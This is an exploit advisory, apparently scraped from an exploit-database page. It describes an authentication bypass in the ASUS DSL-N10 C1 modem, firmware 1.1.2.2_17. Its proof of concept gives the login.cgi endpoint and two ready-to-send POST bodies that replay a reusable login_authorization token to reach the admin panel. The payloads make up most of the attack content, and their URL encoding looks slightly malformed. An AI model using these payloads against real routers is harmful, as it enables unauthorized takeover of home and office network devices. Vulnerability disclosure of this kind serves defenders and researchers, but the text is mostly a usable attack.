facebook facebook twitter rss

ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass

Author: Rednofozi , Published: 01-09-2018
############################################
# Title : ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
# Author :Rednofozi
# category : webapps
# Tested On : Kali Linux
# my team:https://anonysec.org
# me : Rednofozi@yahoo.com
# Vendor HomePage :https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/
# Google Dork: inurl:N/A
# Sofrware version: 1.1.2.2_17
############################################

# search google Dork : N/A

####################Proof of Concept #############

# 1. Description:
# In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization
# parameter in post data, that use for authorization access to admin panel,
# the data of this parameter is not fully random and you can use old data
# or data of another device to access admin panel.

# 2. Proof of Concept:
# Browse http://<Your Modem IP>/login.cgi

# Send this post data:
group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D

# Or this post data:
group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D
######################


# Discovered by : Rednofozi


#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

Like us on Facebook :